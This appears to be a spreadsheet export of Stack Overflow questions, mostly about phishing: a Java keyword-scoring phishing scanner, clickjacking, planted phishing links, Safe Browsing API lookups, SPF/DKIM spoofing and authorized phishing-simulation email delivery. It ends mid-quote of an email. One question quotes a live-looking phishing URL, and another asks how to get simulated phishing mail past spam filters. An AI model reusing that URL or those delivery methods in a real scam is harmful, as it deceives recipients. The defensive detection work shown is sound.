  actionpack (3.2.13) lib/action_dispatch/middleware/show_exceptions.rb:56:in `call'
  railties (3.2.13) lib/rails/rack/logger.rb:32:in `call_app'
  railties (3.2.13) lib/rails/rack/logger.rb:16:in `block in call'
  activesupport (3.2.13) lib/active_support/tagged_logging.rb:22:in `tagged'
  railties (3.2.13) lib/rails/rack/logger.rb:16:in `call'
  actionpack (3.2.13) lib/action_dispatch/middleware/request_id.rb:22:in `call'
  rack (1.4.5) lib/rack/methodoverride.rb:21:in `call'
  rack (1.4.5) lib/rack/runtime.rb:17:in `call'
  activesupport (3.2.13) lib/active_support/cache/strategy/local_cache.rb:72:in `call'
  rack (1.4.5) lib/rack/lock.rb:15:in `call'
  actionpack (3.2.13) lib/action_dispatch/middleware/static.rb:63:in `call'
  railties (3.2.13) lib/rails/engine.rb:479:in `call'
  railties (3.2.13) lib/rails/application.rb:223:in `call'
  rack (1.4.5) lib/rack/content_length.rb:14:in `call'
  railties (3.2.13) lib/rails/rack/log_tailer.rb:17:in `call'
  rack (1.4.5) lib/rack/handler/webrick.rb:59:in `service'
  /home/oded/.rvm/rubies/ruby-2.0.0-p195/lib/ruby/2.0.0/webrick/httpserver.rb:138:in `service'
  /home/oded/.rvm/rubies/ruby-2.0.0-p195/lib/ruby/2.0.0/webrick/httpserver.rb:94:in `run'
  /home/oded/.rvm/rubies/ruby-2.0.0-p195/lib/ruby/2.0.0/webrick/server.rb:295:in `block in start_thread'
  Rendered /home/oded/.rvm/gems/ruby-2.0.0-p195/gems/actionpack-3.2.13/lib/action_dispatch/middleware/templates/rescues/_trace.erb (0.8ms)
  Rendered /home/oded/.rvm/gems/ruby-2.0.0-p195/gems/actionpack-3.2.13/lib/action_dispatch/middleware/templates/rescues/_request_and_response.erb (0.7ms)
  Rendered /home/oded/.rvm/gems/ruby-2.0.0-p195/gems/actionpack-3.2.13/lib/action_dispatch/middleware/templates/rescues/diagnostics.erb within rescues/layout (5.3ms)
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Both the web and Android applications are authorized in Google APIs Console.&lt;/p&gt;
 &lt;p&gt;I don't want to use &lt;code&gt;GoogleAuthUtil&lt;/code&gt; for 3 reasons: I already implemented AccountManager completely, it at least doubles my application size, and I don't see how it solves the problem with my web app.&lt;/p&gt;
 &lt;p&gt;As a temporary solution I made a WebView activity that goes through the same process as the web application. That's not a good solution because the user needs to enter his email and password and he has no way to tell if it's phishing.&lt;/p&gt;
 &lt;p&gt;Gemfile:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;gem 'omniauth-google-oauth2'
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;SessionsControler (app/controllers/sessions_controller.rb):&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;def new
  redirect_to "/auth/google_oauth2"
 end
 def create
  auth = request.env["omniauth.auth"]
  account = case auth['provider']
  when GoogleAccount::PROVIDER then GoogleAccount.find_by_omniauth(auth)
  end
  session[:user_id] = account.user.id
  respond_to do |format|
  format.html { redirect_to root_url, :notice =&amp;gt; "Signed in!" }
  format.json { render json: { result: true } }
  end
 end
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;GoogleAccount (app/models/google_account.rb):&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;after_validation :create_user!, on: :create
 def self.find_by_omniauth(auth)
  google_account = find_by_uid(auth['uid']) || new(uid: auth['uid'])
  google_account.attributes = auth['info'].select { |k, v| k.in?(attribute_names) }
  google_account.save!
  google_account
 end
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;SessionManager.java:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;public void login() {
  _accountManager = AccountManager.get(_activity);
  final Account[] accounts = _accountManager.getAccountsByType("com.google");
  String[] accountNames = new String[accounts.length];
  for (int i = 0; i &amp;lt; accounts.length; i++) {
  accountNames[i] = accounts[i].name;
  }
  new AlertDialog.Builder(_activity).
  setItems(accountNames, new DialogInterface.OnClickListener() {
  @Override
  public void onClick(DialogInterface dialog, int which) {
  _account = accounts[which];
  getAuthToken();
  }
  }).
  show();
 }
 private void getAuthToken() {
  _accountManager.getAuthToken(
  _account, "ah", null, _activity,
  new AccountManagerCallback&amp;lt;Bundle&amp;gt;() {
  @Override
  public void run(AccountManagerFuture&amp;lt;Bundle&amp;gt; result) {
  Bundle bundle;
  try {
  bundle = result.getResult();
  } catch (OperationCanceledException e) {
  // TODO: handle errors
  e.printStackTrace();
  return;
  } catch (AuthenticatorException e) {
  // TODO: handle errors
  e.printStackTrace();
  return;
  } catch (IOException e) {
  // TODO: handle errors
  e.printStackTrace();
  return;
  }
  Intent launch = (Intent) bundle.get(AccountManager.KEY_INTENT);
  if (launch != null) {
  _activity.startActivityForResult(launch, _accountManagerRequestCode);
  return;
  }
  onGetAuthToken(bundle);
  }
  },
  null
  );
 }
 public void onAccountManagerResult(int resultCode, Intent data) {
  switch (resultCode) {
  case Activity.RESULT_OK:
  _accountManager = AccountManager.get(_activity);
  getAuthToken();
  break;
  }
 }
 private void onGetAuthToken(Bundle bundle) {
  final String token = bundle.getString(AccountManager.KEY_AUTHTOKEN);
  login(
  token,
  new LoginResponseHandler() {
  @Override
  public void onResult(boolean result, boolean hadAnonymous, String message, Map&amp;lt;String, List&amp;lt;String&amp;gt;&amp;gt; errors) {
  if (result) {
  setLoggedIn(true);
  } else {
  // Token expired?
  _accountManager.invalidateAuthToken("com.google", token);
  getAuthToken();
  }
  }
  });
 }
 public static void login(String token, LoginResponseHandler loginResponseHandler) {
  RequestParams requestParams = defaultRequestParams();
  requestParams.put("code", token);
  requestParams.put("state", "/");
  _client.get(
  BASE_URL + "/auth/google_oauth2/callback", requestParams,
  new JsonLoginResponseHandler(loginResponseHandler));
 }
 &lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;android&gt;&lt;ruby-on-rails&gt;&lt;oauth&gt;&lt;omniauth&gt;&lt;accountmanager&gt;</t>
  </si>
  <si>
    <t>I am working on a phishing scanner in java</t>
  </si>
  <si>
    <t>&lt;p&gt;&lt;img src="https://i.stack.imgur.com/Y52Ce.jpg" alt="This is how the program should be"&gt; &lt;/p&gt;
 &lt;p&gt;But I cannot quite seem to figure out what the problem is. The assignment wants me to create a phishing scanner that will assign a point value to each based on my estimate of its likeliness to be in a phishing message. Write an application that scans a file or text for the terms and phrases. For each occurence of a keyword or phrase within the text file, add the assigned point value for the total points for that word or phrase. For each keyword or phrase found, output one line with the word or phrase, the number of occurences and the point total. Then show the point total for the entire message.&lt;/p&gt;
 &lt;p&gt;This is what I have so far &lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;import java.io.File;
 import java.util.Scanner;
 public class PhishingScanner {
 // list of phishing words
 private static final String[] phishingWords = { "DHL", "official",
  "bank", "security", "urgent", "alert", "important", "delivery",
  "ebay", "taxes", "credit", "verify", "confirm", "account",
  "bill", "immediately", "address", "telephone", "ssn", "charity",
  "check", "personal", "confidential", "atm", "warning",
  "fraud", "won", "irs", "owe", "pay" };
 // parallel array of point values
 private static final int phishingPoints[] = { 2, 2, 1, 1, 1, 1, 1, 2, 3, 3,
  3, 1, 1, 1, 1, 1, 2, 2, 3, 2, 1, 1, 1, 1, 2, 2, 2, 2, 2, 1 };
 public static void main(String[] args) throws Exception {
  String fileName = args[0].toString();
  Scanner file = new Scanner(new File(fileName));
  int size = phishingWords.length;
  int wordsCount[] = new int[size];
  for (int i = 0; i &amp;lt; size; i++)
  wordsCount[i] = 0;
  while (file.hasNext()) {
  String word = file.next();
  for (int i = 0; i &amp;lt; size; i++)
  if (word.equalsIgnoreCase(phishingWords[i]))
  wordsCount[i]++;
  }
  System.out.println("\nWord\t\t\tCount\tPoints\n");
  int totalPoints = 0;
  for (int i = 0; i &amp;lt; size; i++) {
  if (wordsCount[i] &amp;gt; 0) {
  System.out.printf("%-15s %8d %8d\n", phishingWords[i],
  wordsCount[i], phishingPoints[i]); 
  totalPoints += phishingPoints[i] * wordsCount[i];
  }
  }
  System.out.println("\nTotal points: " + totalPoints);
  file.close();
 }
 } 
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;When I run it this is what I get&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;Exception in thread "main" java.lang.ArrayIndexOutOfBoundsException: 0
 at PhishingScanner.main(PhishingScanner.java:19)
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;which is this line &lt;/p&gt;
 &lt;pre&gt;&lt;code&gt; String fileName = args[0].toString();
 &lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;java&gt;</t>
  </si>
  <si>
    <t>UI Redress and automated clicking</t>
  </si>
  <si>
    <t>&lt;p&gt;There is one thing I don't understand about the UI Redressing attack. Basically what I understand is:&lt;/p&gt;
 &lt;p&gt;1- The user clicks on a external URL&lt;/p&gt;
 &lt;p&gt;2- The attackers webpage opens. Inside this webpage, the original webpage is loaded as an iframe in a transparent manner.&lt;/p&gt;
 &lt;p&gt;3- As the user interacts with the attackers webpage he will actually be interacting with the transparent iframe.&lt;/p&gt;
 &lt;p&gt;Here is where I am confused. Why does the user even need to interact with the loaded webpage? Once the inner iframe is loaded you can have a javascript code to automate clicks on the page. Since this is all happening on the victims browser the target site will receive the victims session cookie and assume everythings fine.&lt;/p&gt;
 &lt;p&gt;Am I missing something here? Thanks in advance&lt;/p&gt;
 &lt;p&gt;Note: Please note this is a UI Redressing attack also known as click-jacking. This is different than phishing attacks. &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;javascript&gt;&lt;html&gt;&lt;security&gt;&lt;iframe&gt;</t>
  </si>
  <si>
    <t>phishing link placed on shared hosting web pages</t>
  </si>
  <si>
    <t>&lt;p&gt;This morning I received notification from Google (noreply@gooogle.com) that several of my accounts on my shared Linux hosting reseller account had phishing links placed on them. They were all different hosted domains on the same reseller account. The links had something in common, so were probably placed by the same hacker. All suspicious links looked like this:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;example.com/~cp/request/linkd/index.php?userid=aname%40domain.com
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;I contacted the hosting company about a possible vulnerability on their servers, but I was wondering if these links could have been placed on my accounts due to one of my admin passwords being compromised. I also would like to know where I could find these links and remove them myself. I'm not sure where to track down the &lt;code&gt;/~cp/request/linkd/&lt;/code&gt; Linux directory. Is this related to a cpanel directory? My search of my file system for index.php did not find any suspicious files or directories.&lt;/p&gt;
 &lt;p&gt;Also, some sites were running WordPress, but are all up to date and hardened installs, and some sites were basic html5 sites (no WordPress).&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;php&gt;&lt;linux&gt;&lt;cpanel&gt;&lt;shared-hosting&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Why is Google's Safe Browsing API not marking my URL as a threat?</t>
  </si>
  <si>
    <t>&lt;p&gt;To prevent users from posting links to phishing scams on our Discord server, I have decided to use the Google Safe Browsing API.&lt;/p&gt;
 &lt;p&gt;Google Transparency Report (which to my knowledge uses the Safe Browsing API) says that the site:&lt;/p&gt;
 &lt;blockquote&gt;
 &lt;p&gt;contains harmful content, including pages that:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;Try to trick visitors into sharing personal info or downloading software&lt;/li&gt;
 &lt;/ul&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;&lt;a href="https://transparencyreport.google.com/safe-browsing/search?url=https:%2F%2Fsteamcommunytiu.com%2Fnew%2F%3Fpartner%3D65855640%26token%3DKj48sll3&amp;amp;hl=en" rel="nofollow noreferrer"&gt;See transparencyreport.google.com&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;However, when using the safe browsing API through node-js, using the &lt;code&gt;googleapis&lt;/code&gt; package, I get a following response for this website (stringified &lt;code&gt;GaxiosPromise&amp;lt;Schema$GoogleSecuritySafebrowsingV4FindThreatMatchesResponse&amp;gt;&lt;/code&gt;):&lt;/p&gt;
 &lt;pre class="lang-json prettyprint-override"&gt;&lt;code&gt;{
  &amp;quot;config&amp;quot;: {
  &amp;quot;url&amp;quot;: &amp;quot;https://safebrowsing.googleapis.com/v4/threatMatches:find?key=...&amp;quot;,
  &amp;quot;method&amp;quot;: &amp;quot;POST&amp;quot;,
  &amp;quot;userAgentDirectives&amp;quot;: [
  {
  &amp;quot;product&amp;quot;: &amp;quot;google-api-nodejs-client&amp;quot;,
  &amp;quot;version&amp;quot;: &amp;quot;5.0.3&amp;quot;,
  &amp;quot;comment&amp;quot;: &amp;quot;gzip&amp;quot;
  }
  ],
  &amp;quot;data&amp;quot;: {
  &amp;quot;client&amp;quot;: {
  &amp;quot;clientId&amp;quot;: &amp;quot;tccpp-safety&amp;quot;,
  &amp;quot;clientVersion&amp;quot;: &amp;quot;0.1.0&amp;quot;
  },
  &amp;quot;threatInfo&amp;quot;: {
  &amp;quot;threatTypes&amp;quot;: [
  &amp;quot;MALWARE&amp;quot;,
  &amp;quot;SOCIAL_ENGINEERING&amp;quot;,
  &amp;quot;UNWANTED_SOFTWARE&amp;quot;,
  &amp;quot;POTENTIALLY_HARMFUL_APPLICATION&amp;quot;,
  &amp;quot;THREAT_TYPE_UNSPECIFIED&amp;quot;
  ],
  &amp;quot;platformTypes&amp;quot;: [
  &amp;quot;ANY_PLATFORM&amp;quot;,
  &amp;quot;PLATFORM_TYPE_UNSPECIFIED&amp;quot;
  ],
  &amp;quot;threatEntryTypes&amp;quot;: [
  &amp;quot;URL&amp;quot;
  ],
  &amp;quot;threatEntries&amp;quot;: [
  {
  &amp;quot;url&amp;quot;: &amp;quot;https://steamcommunytiu.com/new/?partner=65855640&amp;amp;token=Kj48sll3&amp;quot;
  }
  ]
  }
  },
  &amp;quot;headers&amp;quot;: {
  &amp;quot;x-goog-api-client&amp;quot;: &amp;quot;gdcl/5.0.3 gl-node/12.21.0 auth/7.3.0&amp;quot;,
  &amp;quot;Accept-Encoding&amp;quot;: &amp;quot;gzip&amp;quot;,
  &amp;quot;User-Agent&amp;quot;: &amp;quot;google-api-nodejs-client/5.0.3 (gzip)&amp;quot;,
  &amp;quot;Content-Type&amp;quot;: &amp;quot;application/json&amp;quot;,
  &amp;quot;Accept&amp;quot;: &amp;quot;application/json&amp;quot;
  },
  &amp;quot;params&amp;quot;: {
  &amp;quot;key&amp;quot;: &amp;quot;...&amp;quot;
  },
  &amp;quot;retry&amp;quot;: true,
  &amp;quot;body&amp;quot;: &amp;quot;{\&amp;quot;client\&amp;quot;:{\&amp;quot;clientId\&amp;quot;:\&amp;quot;tccpp-safety\&amp;quot;,\&amp;quot;clientVersion\&amp;quot;:\&amp;quot;0.1.0\&amp;quot;},\&amp;quot;threatInfo\&amp;quot;:{\&amp;quot;threatTypes\&amp;quot;:[\&amp;quot;MALWARE\&amp;quot;,\&amp;quot;SOCIAL_ENGINEERING\&amp;quot;,\&amp;quot;UNWANTED_SOFTWARE\&amp;quot;,\&amp;quot;POTENTIALLY_HARMFUL_APPLICATION\&amp;quot;,\&amp;quot;THREAT_TYPE_UNSPECIFIED\&amp;quot;],\&amp;quot;platformTypes\&amp;quot;:[\&amp;quot;ANY_PLATFORM\&amp;quot;,\&amp;quot;PLATFORM_TYPE_UNSPECIFIED\&amp;quot;],\&amp;quot;threatEntryTypes\&amp;quot;:[\&amp;quot;URL\&amp;quot;],\&amp;quot;threatEntries\&amp;quot;:[{\&amp;quot;url\&amp;quot;:\&amp;quot;https://steamcommunytiu.com/new/?partner=65855640&amp;amp;token=Kj48sll3\&amp;quot;}]}}&amp;quot;,
  &amp;quot;responseType&amp;quot;: &amp;quot;json&amp;quot;
  },
  &amp;quot;data&amp;quot;: {},
  &amp;quot;headers&amp;quot;: { ... },
  &amp;quot;status&amp;quot;: 200,
  &amp;quot;statusText&amp;quot;: &amp;quot;OK&amp;quot;,
  &amp;quot;request&amp;quot;: {
  &amp;quot;responseURL&amp;quot;: &amp;quot;https://safebrowsing.googleapis.com/v4/threatMatches:find?key=...&amp;quot;
  }
 }
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;This was printed using the following code snippet:&lt;/p&gt;
 &lt;pre class="lang-js prettyprint-override"&gt;&lt;code&gt;const response = await safebrowsing.threatMatches.find({ requestBody: body });
 console.log(JSON.stringify(response, undefined, 4));
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;You can see that the &lt;code&gt;data&lt;/code&gt; section in the response object is completely empty and normally this is where the &lt;code&gt;matches&lt;/code&gt; array should be.&lt;/p&gt;
 &lt;p&gt;Am I using the API wrong? The Safe Browsing Lookup API says that ULRs &lt;a href="https://developers.google.com/safe-browsing/v4/lookup-api" rel="nofollow noreferrer"&gt;do not need to be canonicalized or encoded.&lt;/a&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;javascript&gt;&lt;node.js&gt;&lt;google-api&gt;&lt;safe-browsing&gt;&lt;safe-browsing-api&gt;</t>
  </si>
  <si>
    <t>Should I use the Reply-To header when sending emails as a service to others?</t>
  </si>
  <si>
    <t>&lt;p&gt;Suppose we have an application that acts as a middleman, allowing Company A to send reports to their customers.&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;Company A --&gt; Company B (me)--&gt; Company A's customers&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;After getting the report we send email notifications to the recipients, but they necessarily originate from our company notifications email address e.g.&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;joe.bloggs@a.com --&gt; notifications@b.com --&gt; peter@c.com&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;Now, customers tend to reply to those email notifications, wanting them to go back to whoever sent the report at Company A. Instead, they end up back at our address, notifications@b.com.&lt;/p&gt;
 &lt;p&gt;A simple solution may be to change the Reply-To header on the notifications we send to the relevant Company A address e.g.&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;joe.bloggs@a.com --&gt; notifications@b.com [Reply-To: joe.bloggs@a.com] --&gt; peter@c.com&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;But my main concerns are:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;the complete discrepancy in email address and domain between the From and Reply-To fields might make spam or phishing filters more eager to flag the emails&lt;/li&gt;
 &lt;li&gt;not all email clients may respect the Reply-To field when people actually click "Reply", and just use From instead. A lesser concern, unless widespread.&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;Are these concerns founded at all? Or, are there other concerns I should have?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;spam&gt;&lt;email-headers&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>404 page showing phishing. how to fix it?</t>
  </si>
  <si>
    <t>&lt;p&gt;I am using wordpress and I needed a application which is made with codeigniter.
 I was useing facebook sdk 4 to let my user login but after few day it got phishing by google chrome. Then I delete the application, now it's 404 page.... I request a review in google but no help.&lt;/p&gt;
 &lt;p&gt;my only one directory got effected by phishing where the application was located else everything is fine. I have talked with google forum but they are all idiots saying i have problem in my 404 page. if the problem in 404 page then my hole site would effected not one directory. I am using popup add from www.popads.net
 I think popup is not the problem can i am useing popup in my full site....&lt;/p&gt;
 &lt;p&gt;&lt;a href="http://www.ogx1.com/addme" rel="nofollow"&gt;http://www.ogx1.com/addme&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;this link will show 404 but if you add a / it will show phishing... i have no idea what is wrong&lt;/p&gt;
 &lt;p&gt;&lt;a href="http://www.ogx1.com/addme/" rel="nofollow"&gt;http://www.ogx1.com/addme/&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;guys need help if you can suggest me with any thing....
 and can you tell me how many day google take to remove the flag?? &lt;/p&gt;
 &lt;p&gt;thanks :)&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;wordpress&gt;&lt;codeigniter&gt;&lt;facebook-php-sdk&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>As a file hosting provider, how do you prevent phishing?</t>
  </si>
  <si>
    <t>&lt;p&gt;We develop a service much like Dropbox or Google Drive or S3 where our customers can host their files and get direct links to them with our domain, e.g. &lt;code&gt;www.ourservice.com/customer_site/path/to/file&lt;/code&gt;.&lt;br&gt;
 Recently we started receiving emails from our server provider that we host phishing &lt;code&gt;.html&lt;/code&gt; files. It appeared that some of our customers did host such htmls and of course we removed the files after that and blocked the customers.&lt;br&gt;
 But the problem is that we would like to prevent this from happening at all, mainly because this lowers our Google Search index and of course we never wanted to be a hosting for phishing scripts.&lt;br&gt;
 Is there a way how other file hosting providers solve this? I guess we could run some checks (anti-virus, anti-phishing etc.) when the customers upload their files, but that would be pretty tedious considering that there's a lot of them. Another options is to periodically check all the files, or all new files, but still I'd better ask if I'm missing any easier solution.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;security&gt;&lt;cloud-storage&gt;&lt;phishing&gt;&lt;virus-scanning&gt;</t>
  </si>
  <si>
    <t>How to send email with a static (but not necessarily dedicated) IP?</t>
  </si>
  <si>
    <t>&lt;p&gt;I do fake phishing campaign for many enteprises in my region and for now, I am sending the fake phishing email from an outlook email address. But a lot of emails go to spam folder.
 To get better results, I need to send email from a static IP so the enterprise can whitelist this specific IP address to their Google Workspace admin account, O365 admin account... so the phishing email comes to the main folder.&lt;/p&gt;
 &lt;p&gt;I read about smtp service with dedicated IP but it does not seem to fit my need because this type of setup requires sending a high volume of email each months while I send very low and irregular volume over the months.&lt;/p&gt;
 &lt;p&gt;Do you have some tips or hints ?&lt;/p&gt;
 &lt;p&gt;Thank you :)&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;smtp&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>How do i join all events related to a single identifier in KQL?</t>
  </si>
  <si>
    <t>&lt;p&gt;A single alert in 365Defender often contains several events categorized by EntityType. I'm trying to collect all data related to a unique AlertID into a single line so it can all be correlated towards other tables (Device*Events). I've tried doing this through bag_pack &amp;gt; summarize make_set ()by AlertID, but I end up with the data double packed which means it's difficult to work with and if I do unpack it I've lost the ability to work with a single line.&lt;/p&gt;
 &lt;p&gt;Is there a proper way to do aggregate the data by a unique key in a single line, or am i SOL?&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;AlertEvidence
 | where DetectionSource contains &amp;quot;Office&amp;quot;
 | where AttackTechniques contains &amp;quot;phish&amp;quot;
 //Collects data
 | extend _mail=bag_pack(&amp;quot;Title&amp;quot;,Title ,&amp;quot;Timestamp&amp;quot;,Timestamp, &amp;quot;AccountName&amp;quot;,AccountName, &amp;quot;DeviceName&amp;quot;,DeviceName, &amp;quot;EmailSubject&amp;quot;,EmailSubject, &amp;quot;NetworkMessageId&amp;quot;,NetworkMessageId,&amp;quot;FileName&amp;quot;,FileName, &amp;quot;FolderPath&amp;quot;,FolderPath, &amp;quot;SHA1&amp;quot;,SHA1, &amp;quot;RemoteUrl&amp;quot;,RemoteUrl)
 //Sorts data per AlertID
 | summarize make_set(_mail) by AlertId
 &lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;azure&gt;&lt;kql&gt;&lt;windows-defender&gt;&lt;microsoft365-defender&gt;</t>
  </si>
  <si>
    <t>Safely handling potentially malicious URLs using Requests</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm building a tool for analyzing emails to try to determine if they're phishing or not and I'd like to see if any of the links in the email redirect, and if they do how many times and to where. I'm currently using the requests library to handle all of that stuff and in order to get a link's history you have to call .get(). Is this safe to do on potentially malicious URLs, and if not is there any way I can get the redirect information without putting my computer at risk?&lt;/p&gt;</t>
  </si>
  <si>
    <t>Selenium chromedriver failing to start with error "session not created from tab crashed"</t>
  </si>
  <si>
    <t>&lt;p&gt;Chrome Version: 88.0.4324.150&lt;br /&gt;
 Chromedriver Version: 88.0.4324.96&lt;br /&gt;
 Selenium Version: 3.141.0&lt;br /&gt;
 Python Version: 3.8.7&lt;/p&gt;
 &lt;p&gt;Trying to run selenium on a non-root docker container which started in &lt;em&gt;read-only&lt;/em&gt; mode with write permission only to &lt;code&gt;/tmp&lt;/code&gt;. When I try to start the driver it's failing with the following error.&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;[ERROR] SessionNotCreatedException: Message: session not created from tab crashed
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;I looked at &lt;a href="https://stackoverflow.com/a/59191325/1105788"&gt;this great answer for similar question&lt;/a&gt; but it doesn't solve my issue.&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Stacktrace:&lt;/strong&gt;&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;File &amp;quot;/var/task/app.py&amp;quot;, line 106, in tc0011
  driver = webdriver.Chrome(options=chrome_options, service_args=['--verbose'], service_log_path='/tmp/chromedriver.log')
 File &amp;quot;/var/lang/lib/python3.8/site-packages/selenium/webdriver/chrome/webdriver.py&amp;quot;, line 76, in __init__
  RemoteWebDriver.__init__(
 File &amp;quot;/var/lang/lib/python3.8/site-packages/selenium/webdriver/remote/webdriver.py&amp;quot;, line 157, in __init__
  self.start_session(capabilities, browser_profile)
 File &amp;quot;/var/lang/lib/python3.8/site-packages/selenium/webdriver/remote/webdriver.py&amp;quot;, line 252, in start_session
  response = self.execute(Command.NEW_SESSION, parameters)
 File &amp;quot;/var/lang/lib/python3.8/site-packages/selenium/webdriver/remote/webdriver.py&amp;quot;, line 321, in execute
  self.error_handler.check_response(response)
 File &amp;quot;/var/lang/lib/python3.8/site-packages/selenium/webdriver/remote/errorhandler.py&amp;quot;, line 242, in check_response
  raise exception_class(message, screen, stacktrace)
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;&lt;strong&gt;Code Snippet:&lt;/strong&gt;&lt;/p&gt;
 &lt;pre class="lang-py prettyprint-override"&gt;&lt;code&gt;chrome_options = ChromeOptions()
 chrome_options.add_argument('--headless')
 chrome_options.add_argument(&amp;quot;--no-sandbox&amp;quot;)
 chrome_options.add_argument(&amp;quot;--disable-dev-shm-usage&amp;quot;)
 chrome_options.add_argument(&amp;quot;--disable-gpu&amp;quot;)
 chrome_options.add_argument(&amp;quot;--no-zygote&amp;quot;)
 chrome_options.add_argument(&amp;quot;--single-process&amp;quot;)
 chrome_options.add_argument(&amp;quot;--disable-dev-tools&amp;quot;)
 chrome_options.add_argument(&amp;quot;--enable-automation&amp;quot;)
 chrome_options.add_argument(&amp;quot;--enable-logging&amp;quot;)
 chrome_options.add_argument(&amp;quot;--log-level=1&amp;quot;)
 chrome_options.add_argument(&amp;quot;--shared-memory-path=/tmp/&amp;quot;)
 chrome_options.add_argument(&amp;quot;--user-data-dir=/tmp/chrome-user-data&amp;quot;)
 driver = webdriver.Chrome(options=chrome_options, service_args=['--verbose'], service_log_path='/tmp/chromedriver.log')
 driver.get('http://checkip.dyndns.org/')
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Additional errors that I'm seeing in chromedriver log:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;[1613321954.518][INFO]: Launching chrome: /usr/bin/google-chrome --disable-background-networking --disable-client-side-phishing-detection --disable-default-apps --disable-dev-shm-usage --disable-dev-tools --disable-gpu --disable-hang-monitor --disable-popup-blocking --disable-prompt-on-repost --disable-sync --enable-automation --enable-blink-features=ShadowDOMV0 --enable-logging --headless --log-level=1 --no-first-run --no-sandbox --no-service-autorun --no-zygote --password-store=basic --remote-debugging-port=0 --shared-memory-path=/tmp/ --single-process --test-type=webdriver --use-mock-keychain --user-data-dir=/tmp/chrome-user-data
 /usr/bin/google-chrome: line 45: /dev/fd/62: No such file or directory
 /usr/bin/google-chrome: line 46: /dev/fd/62: No such file or directory
 [0214/165916.000025:ERROR:bus.cc(393)] Failed to connect to the bus: Failed to connect to socket /run/dbus/system_bus_socket: No such file or directory
 [1613321957.115][INFO]: [1b0728b6a40073109287b767c4b51c8d] RESPONSE InitSession ERROR session not created
 from tab crashed
  (Session info: headless chrome=88.0.4324.150)
 &lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;python&gt;&lt;selenium&gt;&lt;google-chrome&gt;&lt;selenium-webdriver&gt;&lt;selenium-chromedriver&gt;</t>
  </si>
  <si>
    <t>How can phishing emails pass even if SPF and DKIM are set on the domain?</t>
  </si>
  <si>
    <t>&lt;p&gt;I am trying to understand how SPF and DKIM works (and fails).&lt;/p&gt;
 &lt;p&gt;I have a domain, &lt;a href="https://www.majlovesreg.one" rel="nofollow noreferrer"&gt;majlovesreg.one&lt;/a&gt;, that uses Mailgun and contains these TXT DNS records, &lt;code&gt;v=spf1 include:mailgun.org -all&lt;/code&gt; and &lt;code&gt;v=DKIM1; k=rsa; p=**pubkey**&lt;/code&gt;. Mailgun then routes the emails to my Gmail account.&lt;/p&gt;
 &lt;p&gt;One day I received in Gmail a phishing email supposedly from &lt;code&gt;py@hms.harvard.edu&lt;/code&gt;, and I was surprised to see that it was &lt;strong&gt;&lt;a href="https://support.google.com/mail/answer/1311182?hl=en" rel="nofollow noreferrer"&gt;via&lt;/a&gt;&lt;/strong&gt; the &lt;code&gt;majlovesreg.one&lt;/code&gt; domain. Checking the original message shows that the email originated from &lt;code&gt;WIN-ESHJO5UV0E0 (unknown [188.209.52.55]) by newsgw.dd24.net (Postfix)&lt;/code&gt;. Google's &lt;code&gt;ARC-Authentication-Results&lt;/code&gt; however shows that the email passed both SPF and DKIM checks.&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Question:&lt;/strong&gt; How could this email pass SPF? How was it possible for it to pass DKIM as well?&lt;/p&gt;
 &lt;p&gt;For reference, here is the original email:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;Delivered-To: #####@gmail.com
